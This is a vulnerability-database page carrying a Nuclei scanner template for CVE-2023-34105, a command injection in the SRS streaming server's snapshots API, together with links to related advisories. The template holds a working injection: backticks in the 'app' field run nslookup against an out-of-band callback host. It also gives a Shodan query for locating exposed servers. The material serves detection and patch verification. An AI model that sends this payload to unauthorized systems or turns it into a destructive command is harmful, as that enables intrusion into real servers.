Lucene search
K

SRS - Command Injection

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

SRS API server v5.0.137~v5.0.156, v6.0.18~v6.0.47 vulnerable to command injectio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-34105
17 Aug 202500:00
circl
CNNVD
SRS 命令注入漏洞
12 Jun 202300:00
cnnvd
CVE
CVE-2023-34105
12 Jun 202316:30
cve
Cvelist
CVE-2023-34105 SRS has command injection vulnerability in demonstration api-server for HTTP callback.
12 Jun 202316:30
cvelist
NVD
CVE-2023-34105
12 Jun 202317:15
nvd
OSV
CVE-2023-34105 SRS has command injection vulnerability in demonstration api-server for HTTP callback.
12 Jun 202316:30
osv
Prion
Command injection
12 Jun 202317:15
prion
Positive Technologies
PT-2023-24676 · Srs · Srs
12 Jun 202300:00
ptsecurity
RedhatCVE
CVE-2023-34105
23 May 202503:55
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-34105
17 Aug 202500:00
vulncheck_kev
Rows per page
id: CVE-2023-34105

info:
  name: SRS - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
  impact: |
    Unauthenticated attackers with user interaction can inject commands through the app parameter in the snapshots API to execute arbitrary commands on the SRS streaming server.
  remediation: |
    Update SRS (Simple Realtime Server) to a version newer than v5.0.156 or v6.0.47 that properly sanitizes input in the api-server snapshots endpoint.
  reference:
    - https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62
    - https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-34105
    cwe-id: CWE-77,CWE-78
    epss-score: 0.0876
    epss-percentile: 0.94532
    cpe: cpe:2.3:a:ossrs:simple_realtime_server:*:*:*:*:*:*:*:*
  metadata:
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
    verified: true
    max-request: 1
  tags: cve,cve2023,srs,rce,oast,vkev,vuln

http:
  - raw:
      - |
        POST /api/v1/snapshots HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"action":  "on_publish", "app":  "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '{"code":'
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022035c5f20227f25fc95cda2a41e12880fd39996270486d178f93e64a5fb2708b9f022100e0cb61ca798c45a8619381ae4c46d127a7e22bf3140152212b65c610f71dc4bf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.0876
SSVC
21